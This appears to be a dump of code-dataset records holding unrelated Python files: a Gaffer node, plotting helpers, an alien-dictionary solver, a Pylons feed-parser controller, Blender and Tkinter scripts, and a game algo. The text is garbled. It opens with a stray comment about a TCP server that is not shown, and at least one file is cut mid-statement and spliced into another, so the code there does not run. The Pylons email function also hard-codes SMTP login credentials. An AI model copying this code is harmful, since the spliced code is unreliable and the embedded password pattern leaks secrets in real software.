Engine Design Inc. 
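The TCP server above has two Python 3 bugs: the log line applies % to a string with no placeholder (a TypeError at runtime), and socket.send requires bytes, not str. A corrected per-connection handler, as a sketch rather than the original author's code:

```python
def handle_client(clientsocket, address):
    """One connection: greet the client and close."""
    print("received connection from %s" % str(address))  # the original '%' had no placeholder
    message = 'hello! Thank you for connecting to the server' + "\r\n"
    clientsocket.send(message.encode('utf-8'))  # Python 3 sockets carry bytes, not str
    clientsocket.close()
```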
All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n# \n# * Redistributions of source code must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer.\n# \n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided with\n# the distribution.\n# \n# * Neither the name of John Haddon nor the names of\n# any other contributors to this software may be used to endorse or\n# promote products derived from this software without specific prior\n# written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# \n##########################################################################\n\nimport IECore\nimport Gaffer\n\nclass TextWriter( Gaffer.ExecutableNode ) :\n\t\n\tdef __init__( self, name=\"TextWriter\" ) :\n\t\t\n\t\tGaffer.ExecutableNode.__init__( self, name )\n\t\t\n\t\tself.addChild( Gaffer.StringPlug( \"fileName\", Gaffer.Plug.Direction.In ) )\n\t\tself.addChild( Gaffer.StringPlug( \"text\", Gaffer.Plug.Direction.In ) )\n\t\n\tdef execute( self, contexts ):\n\t\t\n\t\tfor context in contexts :\n\t\t\t\n\t\t\twith context :\n\t\t\t\tfileName = context.substitute( self[\"fileName\"].getValue() )\n\t\t\t\ttext = context.substitute( self[\"text\"].getValue() )\n\t\t\t\n\t\t\treplace = context.get( \"textWriter:replace\", IECore.StringVectorData() )\n\t\t\tif replace and len(replace) == 2 :\n\t\t\t\ttext = text.replace( replace[0], replace[1] )\n\t\t\t\n\t\t\twith file( fileName, \"w\" ) as f :\n\t\t\t\tf.write( text )\n\t\n\tdef executionHash( self, context ) :\n\t\t\n\t\th = Gaffer.ExecutableNode.executionHash( self, context )\n\t\th.append( context.getFrame() )\n\t\th.append( context.get( \"textWriter:replace\", IECore.StringVectorData() ) )\n\t\th.append( context.substitute( self[\"fileName\"].getValue() ) )\n\t\th.append( context.substitute( self[\"text\"].getValue() ) )\n\t\t\n\t\treturn h\n\nIECore.registerRunTimeTyped( TextWriter, typeName = \"GafferTest::TextWriter\" )\n","sub_path":"python/GafferTest/TextWriter.py","file_name":"TextWriter.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"150936721","text":"import matplotlib.pyplot as plt\nfrom matplotlib import pyplot as mp\n\ndef show_image(img, title = \"\", cmap='gray', file = 'empty'):\n plt.title(title)\n plt.imshow(img, cmap)\n if file not in ['empty']:\n mp.savefig('output_images/' + file + '.jpg', type=\"jpg\", bbox_inches='tight')\n \ndef show_images(images, columns = 2, colormap='gray', name = 
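Two notes on TextWriter: `file(fileName, "w")` is the Python 2 builtin (Python 3 code would use `open`), and executionHash deliberately folds in every input that affects the output file so identical tasks can be detected. The same hashing idea with the standard library, as a generic sketch (IECore's MurmurHash is Gaffer-specific):

```python
import hashlib

def execution_hash(file_name, text, frame):
    """Digest of everything that determines the output, for task de-duplication."""
    h = hashlib.sha256()
    for part in (file_name, text, str(frame)):
        h.update(part.encode('utf-8'))
        h.update(b'\x00')  # separator so ('ab', 'c') hashes differently from ('a', 'bc')
    return h.hexdigest()
```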
'empty'):\n fig = plt.figure(figsize=(20,10))\n for i, image in enumerate(images):\n subfig = fig.add_subplot(len(images) / columns + 1, columns, i + 1)\n subfig.imshow(image)\n #if name not in ['empty']:\n # mp.savefig('test_images_output/' + name + '.png', type=\"png\", bbox_inches='tight')\n\ndef show_images_side_by_side(image1, image2, title1 =\"\", title2 = \"\", cmap='gray', file = 'empty'):\n fig = plt.figure(figsize=(20,10))\n subfig1 = fig.add_subplot(1,2,1)\n subfig1.imshow(image1)\n subfig1.set_title(title1)\n subfig2 = fig.add_subplot(1,2,2)\n subfig2.imshow(image2, cmap)\n subfig2.set_title(title2)\n if file not in ['empty']:\n mp.savefig('output_images/' + file + '.jpg', type=\"jpg\", bbox_inches='tight')\n plt.show()\n \ndef show_images_side_by_side3(image1, image2, image3, title1 =\"\", title2 = \"\", title3 = \"\", cmap='gray', file = \"empty\"):\n fig = plt.figure(figsize=(20,10))\n subfig1 = fig.add_subplot(1,3,1)\n subfig1.imshow(image1)\n subfig1.set_title(title1)\n subfig2 = fig.add_subplot(1,3,2)\n subfig2.imshow(image2)\n subfig2.set_title(title2)\n subfig3 = fig.add_subplot(1,3,3)\n subfig3.imshow(image3, cmap)\n subfig3.set_title(title3)\n if file not in ['empty']:\n mp.savefig('output_images/' + file + '.jpg', type=\"jpg\", bbox_inches='tight')\n plt.show()\n","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"64816903","text":"from collections import defaultdict\n\nclass Solution:\n \"\"\"\n @param words: a list of words\n @return: a string which is correct order\n \"\"\"\n def alienOrder(self, words):\n # Write your code here\n letter_after_graph = defaultdict(list) # Letter to letters after it.\n letter_before_count = defaultdict(int) # Count of letters before than it.\n for i in range(len(words)): \n for k in range(len(words[i])):\n if words[i][k] not in letter_before_count:\n letter_before_count[words[i][k]] = 0\n if i == len(words) - 1:\n continue\n j = 0\n while (\n j < len(words[i]) and\n j < len(words[i+1]) and\n words[i][j] == words[i+1][j]):\n j += 1\n if j < len(words[i]) and j < len(words[i+1]):\n letter_after_graph[words[i][j]] = words[i+1][j]\n letter_before_count[words[i+1][j]] += 1\n # Construct letter order based on letter graph.\n orders = []\n # Stores (letter, letter before)\n queue = [(l, None) for l, c in letter_before_count.items() if c == 0]\n while queue:\n l, l_before = queue.pop(0)\n # Insert into orders also need to consider human alphabetical order.:\n if l_before:\n idx = orders.index(l_before) + 1\n else:\n idx = 0\n while idx < len(orders) and orders[idx] < l:\n idx += 1\n orders.insert(idx, l)\n # Find next set of letters to visit.\n for l_after in letter_after_graph[l]:\n letter_before_count[l_after] -= 1\n if letter_before_count[l_after] == 0 and l_after not in orders:\n queue.append((l_after, l))\n\n if sum(letter_before_count.values()) == 0: \n return ''.join(orders)\n else:\n return ''","sub_path":"python3/l0269_alien_dictinary.py","file_name":"l0269_alien_dictinary.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"651461028","text":"# coding: utf-8\nfrom datetime import timedelta\nimport logging\nimport json\n\nfrom pylons import request, response, session, tmpl_context as c, url\nfrom pylons.decorators import jsonify\nfrom pylons.controllers.util import abort, redirect\n\nfrom 
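The alien-dictionary solution above interleaves Kahn's topological sort with an extra alphabetical tie-break. Stripped of the tie-break, the core algorithm is short; a self-contained version that returns an empty list when the constraints contain a cycle:

```python
from collections import defaultdict, deque

def topo_sort(edges, nodes):
    """Kahn's algorithm: a topological order of nodes, or [] if a cycle exists."""
    after = defaultdict(list)
    indeg = {n: 0 for n in nodes}
    for a, b in edges:  # each edge means a must come before b
        after[a].append(b)
        indeg[b] += 1
    dq = deque(n for n in nodes if indeg[n] == 0)
    order = []
    while dq:
        n = dq.popleft()
        order.append(n)
        for m in after[n]:
            indeg[m] -= 1
            if indeg[m] == 0:
                dq.append(m)
    return order if len(order) == len(nodes) else []

print(topo_sort([('w', 'e'), ('e', 'r'), ('r', 't')], ['w', 'e', 'r', 't']))
# ['w', 'e', 'r', 't']
```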
parseryml.lib.base import BaseController, render\nfrom parseryml.model.baseModel import Base\nfrom parseryml.model.marketModel import MarketModel\nfrom parseryml.lib import helpers as h\n\n\nfrom parseryml.model.userModel import UserModel\nfrom parseryml.lib.tasks import parse_by_id\n\nimport smtplib\nfrom email.MIMEText import MIMEText\nfrom email.mime.application import MIMEApplication\nfrom email.mime.multipart import MIMEMultipart\n\nimport logging\nlog = logging.getLogger(__name__)\n\nclass ParserSettingsController(BaseController):\n def __init__(self):\n self.categories = None \n\n def index(self):\n if session.has_key('login'):\n if session['login']:\n return render('/parser_settings/parser.mako.html')\n else:\n return render('/login/login.mako.html')\n else:\n return render('/login/login.mako.html')\n\n def login(self):\n UM = UserModel()\n if UM.check_user_pwd(request.params.get('user_login'), request.params.get('user_password')):\n session['login'] = True\n session.save()\n else:\n session['login'] = False\n session.save()\n return u'Не верный Логин или пароль'\n\n def exit(self):\n if session.has_key('login'):\n session['login'] = False\n session.save()\n return\n\n def set_time_settings(self):\n MM = MarketModel()\n params = request.params.get('params', \"{}\")\n params = h.FJSON(params)\n if not params['interval']:\n params = None\n MM.set_time_settings(request.params.get('market_id'), params)\n return\n\n @jsonify\n def get_states(self):\n stack = request.params.getall('markets[]')\n market_ids = [0]\n for market_id in stack:\n market_ids.append(int(market_id))\n market = MarketModel()\n return {'states':market.get_states(market_ids)}\n\n @jsonify\n def get_markets(self):\n MM = MarketModel()\n limit = request.params.get('limit', 20)\n start = request.params.get('start', 0)\n sort_by = request.params.get('sort')\n sort_dir = request.params.get('dir')\n pattern = request.params.get('pattern', '')\n group = request.params.get('groupBy', '')\n if sort_dir == 'ASC':\n sort_dir = 1\n else:\n sort_dir = -1\n \n markets = MM.get_all(start, limit, sort_by, sort_dir, pattern, group)\n\n products = []\n\n total = MM.get_count(pattern)\n\n for market in markets:\n result = {\n 'id': market.get('id', \"\"),\n 'file_date': str(market.get('file_date', \"\")),\n 'date_create': str(market.get('dateCreate', \"\")),\n 'title': market.get('title', \"\"),\n 'status': market.get('state', \"\"),\n 'urlExport': market.get('urlExport', \"\"),\n 'urlMarket': market.get('urlMarket', \"\"),\n 'last_update': str(market.get('last_update', \"\")),\n 'time_setting': market.get('time_setting', \"\"),\n 'interval': market.get('interval', 0),\n 'status_id': market.get('status_id', 0),\n 'categories_count': 0,\n 'offers_count': 0,\n 'started': \"\",\n 'finished': \"\",\n 'delta': {},\n }\n\n categories = market.get('Categories', None)\n if categories is not None:\n result['categories_count'] = len(categories)\n\n offersModel = Base.get_offer_collection()\n result['offers_count'] = offersModel.find({'shopId':result['id']},{'title':1}).count()\n \n if result['interval'] == 0:\n if 'time_setting' in result and 'interval' in result['time_setting'] and 'interval_count' in result['time_setting']:\n argument = 0\n if result['time_setting']['interval'] == u'час':\n argument = 2400\n elif result['time_setting']['interval'] == u'день':\n argument = 100\n elif result['time_setting']['interval'] == u'месяц':\n argument = 10\n elif result['time_setting']['interval'] == u'год':\n argument = 1\n\n result['interval'] = 
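get_markets converts the grid's sort direction and pagination into a MarketModel.get_all call whose implementation is not shown here. A typical pymongo realization of that start/limit/sort/pattern contract might look like this (an assumption, not the project's actual code):

```python
import re

def get_all(collection, start, limit, sort_by, sort_dir, pattern):
    """Paged, sorted, pattern-filtered query; sort_dir is 1 (ASC) or -1 (DESC)."""
    query = {}
    if pattern:
        # case-insensitive substring match on the title field
        query['title'] = {'$regex': re.escape(pattern), '$options': 'i'}
    cursor = collection.find(query)
    if sort_by:
        cursor = cursor.sort(sort_by, sort_dir)
    return list(cursor.skip(int(start)).limit(int(limit)))
```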
argument * result['time_setting']['interval_count']\n\n data = {'id':result['id'], 'interval':result['interval']}\n MM.save(data)\n \n if 'status' in result and 'state' in result['status']:\n if 'started' in result['status']:\n result['started'] = str(result['status']['started'])\n if 'finished' in result['status']:\n result['finished'] = str(result['status']['finished'])\n\n delta = result['status']['finished'] - result['status']['started']\n result['delta'] = {\n 'days': delta.days,\n 'sec': delta.seconds\n }\n \n del result['status']['finished']\n \n del result['status']['started']\n\n if result['status']['state'] == 'finished':\n argument = 1\n elif result['status']['state'] == 'error':\n argument = 2\n elif result['status']['state'] == 'aborted':\n argument = 3\n elif result['status']['state'] == 'parsing':\n argument = 20\n elif result['status']['state'] == 'pending':\n argument = 5\n else:\n argument = 10\n else:\n argument = 10\n result['status'] = {'state':'new'}\n data = {'id':result['id'], 'state':result['status']}\n MM.save(data)\n\n if result['status_id'] != argument:\n result['status_id'] = argument\n data = {'id':result['id'], 'status_id':result['status_id']}\n MM.save(data)\n \n products.append(result)\n\n result = {\"total\": str(total), \"data\": products}\n\n session.save()\n\n return result\n\n @jsonify\n def start_parsing_market(self):\n market_id = int(request.params.get('market_id'))\n \n data = {\n 'id': market_id,\n 'state': {\n 'state':'parsing',\n }\n }\n \n market = MarketModel()\n market.save(data)\n\n parse_by_id.apply_async(args=[market_id], queue=\"parse_yml_task\", routing_key=\"parseryml.process\")\n return {'result': 'success'}\n\n def send_email(self, market_id, email):\n # отправитель\n me = 'rynok_parser@yottos.com'\n # получатель\n you = email\n # текст письма\n text = 'Это письмо к вам пришло потому что в файле выгрузки есть не валидные продукты список их прикреплен в файле'\n text = msg = MIMEText(text, _charset=\"utf-8\")\n # заголовок письма\n subj = 'Hello!!'\n # параметры SMTP-сервера\n server = \"yottos.com\" # \"smtp.mail.ru\"\n port = 26\n user_name = \"support@yottos.com\"\n user_passwd = \"57fd8824\"\n\n msg = MIMEMultipart()\n msg['Subject'] = subj\n msg['From'] = me\n msg['To'] = you\n\n path = 'parseryml/public/not_valid/' + str(market_id) + '.txt'\n attach = MIMEApplication(open(path, 'r').read())\n attach.add_header('Content-Disposition', 'attachment', filename='errors.txt')\n msg.attach(text)\n msg.attach(attach)\n\n s = smtplib.SMTP(server, port)\n s.starttls()\n s.set_debuglevel(5)\n s.login(user_name, user_passwd)\n s.sendmail(me, you, msg.as_string())\n s.quit()","sub_path":"pars-yml/parseryml/controllers/parser_settings.py","file_name":"parser_settings.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"250665762","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
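send_email assembles the MIME tree by hand and embeds SMTP credentials in the source (they belong in configuration). Since Python 3.6, email.message.EmailMessage does the same assembly with less ceremony; a sketch of an equivalent send, with server, credentials and attachment path as placeholders:

```python
import smtplib
from email.message import EmailMessage

def send_report(host, port, user, password, sender, recipient, attachment_path):
    """Send a plain-text report with one attached errors file."""
    msg = EmailMessage()
    msg['Subject'] = 'Invalid products report'
    msg['From'] = sender
    msg['To'] = recipient
    msg.set_content('The attached file lists products that failed validation.')
    with open(attachment_path, 'rb') as f:
        msg.add_attachment(f.read(), maintype='text', subtype='plain',
                           filename='errors.txt')
    with smtplib.SMTP(host, port) as s:
        s.starttls()
        s.login(user, password)
        s.send_message(msg)
```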
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nimport bpy\nimport imp\n\ncurve_helper = imp.load_source('curve_helper','curve_helper.py')\n#from . import curve_helper as curve_helper\n\n\nclass bulkhead:\n station=0\n the_hull_definition=None\n thickness=0.05\n bulkhead_object=None\n bulkhead_void_object=None\n bulkhead_collection=None\n bulkhead_void_collection=None\n\n def __init__(self,the_hull_definition,station_location):\n self.station=station_location\n self.the_hull_definition=the_hull_definition\n self.bulkhead_collection=curve_helper.make_collection(\"bulkheads\",bpy.context.scene.collection.children)\n self.bulkhead_void_collection=curve_helper.make_collection(\"bulkhead_void\",bpy.context.scene.collection.children)\n\n #curve_helper.hide_object(self.bulkhead_void_collection)\n\n import bpy\n\n def move_verts_z(self,ob,new_val):\n\n vert_list=[]\n\n for v in ob.data.vertices:\n #print(v.index) \n #print(v.co.z)\n \n vert_list.append([v.index,v.co.z])\n \n # print(\"presort\")\n # for v in vert_list:\n # print(\"%d %f\" % (v[0],v[1]))\n \n\n def secondVal(val):\n return val[1]\n\n vert_list.sort(key=secondVal)\n\n # print(\"postsort\")\n # for v in vert_list:\n # print(\"%d %f\" % (v[0],v[1]))\n\n mat_world = ob.matrix_world\n #print(\"world: %s\"%mat_world)\n \n for i in range(0,len(vert_list)):\n # for i in range(0,filter_lowest):\n #print(\" \")\n vert=ob.data.vertices[vert_list[i][0]].co\n #print(\"vert %d: %s\"%(i,vert_list[i]))\n #vert.z=0\n \n pos_world = mat_world @ vert\n #print(\"world original: %s\"%pos_world)\n \n if pos_world.z 5:\n if path[-5:] != \".xlsx\":\n path = path + \".xlsx\"\n\n analysis.exportStatistics(entry.get())\n root.destroy()\n\n\ndef analysisGUI(analysis):\n stats = analysis.calcStatistics()\n root = tk.Tk()\n root.title(\"Delta Analysis Details\")\n\n titleFont = tkFont.Font(size=15)\n dataFont = tkFont.Font(size=12)\n\n frame1 = tk.Frame(root, padx=5, pady=5)\n frame1.pack()\n tk.Label(frame1, text=\"Delta Analysis Details\", font=titleFont).pack()\n\n frame2 = tk.Frame(frame1, padx=1, pady=5)\n frame2.pack()\n tk.Label(frame2, text=\"Total Primary: \" + str(stats[0]), font=dataFont, anchor='w').pack(fill=tk.X)\n tk.Label(frame2, text=\"Total Secondary: \" + str(stats[1]), font=dataFont, anchor='w').pack(fill=tk.X)\n tk.Label(frame2, text=\"Accurate: \" + str(stats[2]), font=dataFont, anchor='w').pack(fill=tk.X)\n tk.Label(frame2, text=\"Percentage: \" + str(stats[3]) + \"%\", font=dataFont, anchor='w').pack(fill=tk.X)\n tk.Label(frame2, text=\"Underread: \" + str(stats[4]), font=dataFont, anchor='w').pack(fill=tk.X)\n tk.Label(frame2, text=\"Percentage: \" + str(stats[5]) + \"%\", font=dataFont, anchor='w').pack(fill=tk.X)\n tk.Label(frame2, text=\"Overread: \" + str(stats[6]), font=dataFont, anchor='w').pack(fill=tk.X)\n tk.Label(frame2, text=\"Percentage: \" + str(stats[7]) + \"%\", font=dataFont, anchor='w').pack(fill=tk.X)\n\n tk.Label(root, text=\"File Path: \", font=dataFont, width=12).pack()\n frame_file = tk.Frame(root, padx=5, pady=5)\n frame_file.pack(fill=tk.X)\n entry = tk.Entry(frame_file, width=30)\n entry.pack(fill=tk.BOTH, expand=True, side=tk.LEFT, padx=5, pady=5)\n tk.Button(frame_file, text=\"Choose Path\", command=partial(saveFileDialog, 
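move_verts_z defines a named secondVal helper just to sort (index, z) pairs by their second element; a lambda or operator.itemgetter is the idiomatic spelling of the same sort:

```python
from operator import itemgetter

verts = [(0, 0.5), (1, -0.2), (2, 0.1)]
verts.sort(key=itemgetter(1))  # equivalent to key=lambda v: v[1]
print(verts)  # [(1, -0.2), (2, 0.1), (0, 0.5)]
```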
entry)).pack(side=tk.LEFT)\n\n tk.Button(root, text=\"Export Data\", font=dataFont, command=partial(exportAnalysis, root, analysis, entry)).pack(side=tk.BOTTOM, pady=5)\n\n root.update()\n root.minsize(root.winfo_width(), root.winfo_height())\n root.mainloop()\n print(\"Analysis\")\n\n\ndef Delta_Analysis(root, entry1, entry2, var):\n path1 = entry1.get()\n path2 = entry2.get()\n type1 = Delta_Module.File_Type.ATT if (var.get() == 2) else Delta_Module.File_Type.DELTA\n type2 = Delta_Module.File_Type.DELTA if (var.get() == 2) else Delta_Module.File_Type.ATT\n\n primaryCSV = Delta_Module.Delta_Dataframe(\"Primary CSV\", path1, type1)\n secondaryCSV = Delta_Module.Delta_Dataframe(\"Secondary CSV\", path2, type2)\n print(secondaryCSV.data_frame)\n\n analysis = Delta_Module.Delta_Analysis(\"Analysis\", primaryCSV, secondaryCSV)\n analysis.printStatistics()\n\n root.destroy()\n analysisGUI(analysis)\n\n\ndef fileGUI():\n root = tk.Tk()\n root.title(\"Delta Analysis Software\")\n var1 = tk.IntVar()\n titleFont = tkFont.Font(size=15)\n buttonFont = tkFont.Font(size=12)\n\n tk.Label(root, text=\"Delta Analysis Software\", font=titleFont).pack()\n\n frame_file1 = tk.Frame(root, padx=5, pady=5)\n frame_file1.pack(fill=tk.X)\n tk.Label(frame_file1, text=\"Primary File\", font=buttonFont, width=12).pack(side=tk.LEFT)\n entry1 = tk.Entry(frame_file1, width=30)\n entry1.pack(fill=tk.BOTH, expand=True, side=tk.LEFT, padx=5, pady=5)\n tk.Button(frame_file1, text=\"Select File\", command=partial(openFileDialog, entry1)).pack(side=tk.LEFT)\n\n frame_settings1 = tk.Frame(root, padx=5, pady=5)\n frame_settings1.pack()\n radio1_delta = tk.Radiobutton(frame_settings1, text=\"Delta\", variable=var1, value=1)\n radio1_att = tk.Radiobutton(frame_settings1, text=\"ATT\", variable=var1, value=2)\n radio1_delta.pack(side=tk.LEFT, fill=tk.X)\n radio1_att.pack(side=tk.RIGHT, fill=tk.X)\n\n frame_file2 = tk.Frame(root, padx=5, pady=5)\n frame_file2.pack(fill=tk.X)\n tk.Label(frame_file2, text=\"Secondary File\", font=buttonFont, width=12).pack(side=tk.LEFT)\n entry2 = tk.Entry(frame_file2, width=30)\n entry2.pack(fill=tk.BOTH, expand=True, side=tk.LEFT, padx=5, pady=5)\n tk.Button(frame_file2, text=\"Select File\", command=partial(openFileDialog, entry2)).pack(side=tk.LEFT)\n\n frame_settings2 = tk.Frame(root, padx=5, pady=5)\n frame_settings2.pack()\n radio2_delta = tk.Radiobutton(frame_settings2, text=\"Delta\", variable=var1, value=2)\n radio2_att = tk.Radiobutton(frame_settings2, text=\"ATT\", variable=var1, value=1)\n radio2_delta.pack(side=tk.LEFT, fill=tk.X)\n radio2_att.pack(side=tk.RIGHT, fill=tk.X)\n\n tk.Button(root, text=\"Perform Analysis\", command=partial(Delta_Analysis, root, entry1, entry2, var1)).pack(side=tk.BOTTOM, pady=5)\n\n root.update()\n root.minsize(root.winfo_width(), root.winfo_height())\n root.mainloop()\n\n\ndef HnM_Main():\n def parseGroup(title, path, typ, amount):\n group = []\n for i in range(1, amount+1):\n group.append(HnM_Module.HnM_Dataframe(title.format(i), path.format(i), typ))\n return group\n\n Master_Floor = HnM_Module.HnM_Dataframe(\"HNM_SalesFloor_CSV\",\n \"../files/HnM/read/MASTERFILE_Complete.xlsx\",\n HnM_Module.File_Type.Expected_SalesFloor)\n Master_Floor.writeCSV()\n\n Master_Stock = HnM_Module.HnM_Dataframe(\"HNM_StockRoom_CSV\",\n \"../files/HnM/read/MASTERFILE_Complete.xlsx\",\n HnM_Module.File_Type.Expected_StockRoom)\n Master_Stock.writeCSV()\n\n\ndef Delta_Main():\n date = [12, 10, 2019]\n String = \"../Delta 
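Throughout this GUI, functools.partial binds arguments to callbacks at widget-creation time, which is why several buttons can share one handler. The pattern in isolation:

```python
import tkinter as tk
from functools import partial

def greet(name):
    print("hello,", name)

root = tk.Tk()
# partial freezes the argument now; a bare reference to greet could not carry it
tk.Button(root, text="Greet", command=partial(greet, "world")).pack()
root.mainloop()
```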
Files/read/2019{0}{1}_BSM_PIER2.csv\".format(str(date[0]).zfill(2), str(date[1]).zfill(2))\n deltaCSV = Delta_Module.Delta_Dataframe(\"Delta CSV\", String,\n Delta_Module.File_Type.DELTA)\n\n attCSV = Delta_Module.Delta_Dataframe(\"ATT CSV\", \"../Delta Files/read/Delta_AU_EBT Data_BR_AT_{0}{1}19__PT_0259.csv\".format(\n str(date[0]).zfill(2), str(date[1]+1).zfill(2)),\n Delta_Module.File_Type.ATT)\n\n # print(\"Analysis for {0}/{1}/{2}\\n\".format(date[0], date[1], date[2]))\n delta_analysis = Delta_Module.Delta_Analysis(\"Delta based Accuracy {0}-{1}-{2}\".format(date[0], date[1], date[2]),\n deltaCSV, attCSV)\n # delta_analysis.printStatistics()\n # print()\n att_analysis = Delta_Module.Delta_Analysis(\"AT&T based Accuracy {0}-{1}-{2}\".format(date[0], date[1], date[2]),\n attCSV, deltaCSV)\n # att_analysis.printStatistics()\n # print()\n\n delta_analysis.exportStatistics(\"../Delta Files/write/{0}.xlsx\".format(delta_analysis.title))\n\n analysisGUI(delta_analysis)\n\n\nDelta_Main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"507338738","text":"#!/user/bin/env python\n# -*- coding: UTF-8 -*-\n'''\nThis python script main purpose is to change you data line in reading data process(you needn't to change your original data),\ntransform function change original line to new lines.\n\ncan used for:\n 1. change other data format to ytk-learn data format\n 2. feature transform/scale, features cartesian product, generating polynomial features(x1, x2, x3) -> (x1, x2, x3, x1x2, x1x3, x2x3, x1x2x3)\n 3. change sample weight\n 4. samples sampling, e.g. negative samples sampling\n 5. generate multi lines\n 6. you can use sklearn, pandas... powerful third libs to handle your data\n'''\n\n# line -> lines, if this line is filtered, return []\ndef transform(bytesarr):\n # don't delete this code\n line = bytesarr.decode(\"utf-8\")\n # custom code here\n # ...\n cols = line.split(' ')\n label = cols[0]\n feas = ','.join(cols[1:])\n new_line = '###'.join(['1', label, feas])\n return [new_line]","sub_path":"demo/gbdt/regression_l2/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"71279561","text":"import gamelib\nimport random\nimport math\nimport statistics\nfrom sys import maxsize\n\n\n'''\nMost of the algo code you write will be in this file unless you create new\nmodules yourself. Start by modifying the 'on_turn' function.\n\nAdvanced strategy tips:\n\nAdditional functions are made available by importing the AdvancedGameState\nclass from gamelib/advanced.py as a replcement for the regular GameState class\nin game.py.\n\nYou can analyze action frames by modifying algocore.py.\n\nThe GameState.map object can be manually manipulated to create hypothetical\nboard states. 
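Delta_Main derives the second filename by adding 1 to the day field (date[1]+1) and zero-padding by hand, which produces an invalid day at month boundaries. datetime formatting and timedelta arithmetic cover both concerns; a sketch reproducing the same two names for 2019-12-10:

```python
from datetime import date, timedelta

run = date(2019, 12, 10)
delta_name = "../Delta Files/read/{:%Y%m%d}_BSM_PIER2.csv".format(run)
next_day = run + timedelta(days=1)  # day arithmetic that survives month ends
att_name = ("../Delta Files/read/Delta_AU_EBT Data_BR_AT_{:%m%d%y}"
            "__PT_0259.csv".format(next_day))
```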
Though, we recommended making a copy of the map to preserve\nthe actual current map state.\n'''\n\nclass AlgoStrategy(gamelib.AlgoCore):\n def __init__(self):\n super().__init__()\n random.seed()\n\n def on_game_start(self, config):\n '''\n Read in config and perform any initial setup here\n '''\n gamelib.debug_write('Configuring your custom algo strategy...')\n self.config = config\n global FILTER, ENCRYPTOR, DESTRUCTOR, PING, EMP, SCRAMBLER\n FILTER = config[\"unitInformation\"][0][\"shorthand\"]\n ENCRYPTOR = config[\"unitInformation\"][1][\"shorthand\"]\n DESTRUCTOR = config[\"unitInformation\"][2][\"shorthand\"]\n PING = config[\"unitInformation\"][3][\"shorthand\"]\n EMP = config[\"unitInformation\"][4][\"shorthand\"]\n SCRAMBLER = config[\"unitInformation\"][5][\"shorthand\"]\n\n def on_turn(self, cmd):\n '''\n This function is called every turn with the game state wrapper as\n an argument. The wrapper stores the state of the arena and has methods\n for querying its state, allocating your current resources as planned\n unit deployments, and transmitting your intended deployments to the\n game engine.\n '''\n game_state = gamelib.GameState(self.config, cmd)\n gamelib.debug_write('Performing turn {} of your custom algo strategy'.format(game_state.turn_number))\n\n self.starter_strategy(game_state)\n\n game_state.submit_turn()\n\n '''\n NOTE: All the methods after this point are part of the sample starter-algo\n strategy and can safey be replaced for your custom algo.\n '''\n def starter_strategy(self, game_state):\n '''\n Build the C1 logo. Calling this method first prioritises\n resources to build and repair the logo before spending them\n on anything else.\n '''\n self.build_c1_logo(game_state)\n\n '''\n Then build additional defenses.\n '''\n self.build_defences(game_state)\n\n '''\n Finally deploy our information units to attack.\n '''\n self.deploy_attackers(game_state)\n\n # Here we make the C1 Logo!\n def build_c1_logo(self, game_state):\n '''\n We use Filter firewalls because they are cheap\n\n First, we build the letter C.\n '''\n\n\n tower_locations_filter = [[6, 11], [6, 9], [10, 6], [16, 6], [20, 9], [20, 11]]\n game_state.attempt_spawn(FILTER, tower_locations_filter)\n tower_locations_destruct = [[3, 12], [8, 8], [13, 10], [19, 7], [23, 12]]\n game_state.attempt_spawn(DESTRUCTOR, tower_locations_destruct)\n tower_locations_encrypt = [[13, 5]]\n game_state.attempt_spawn(ENCRYPTOR, tower_locations_encrypt)\n\n self.prev_starting_bits = game_state.get_resource(game_state.BITS)\n self.prev_enemy_bits = game_state.get_resource(game_state.BITS, 1)\n self.prev_starting_cores = game_state.get_resource(game_state.CORES)\n 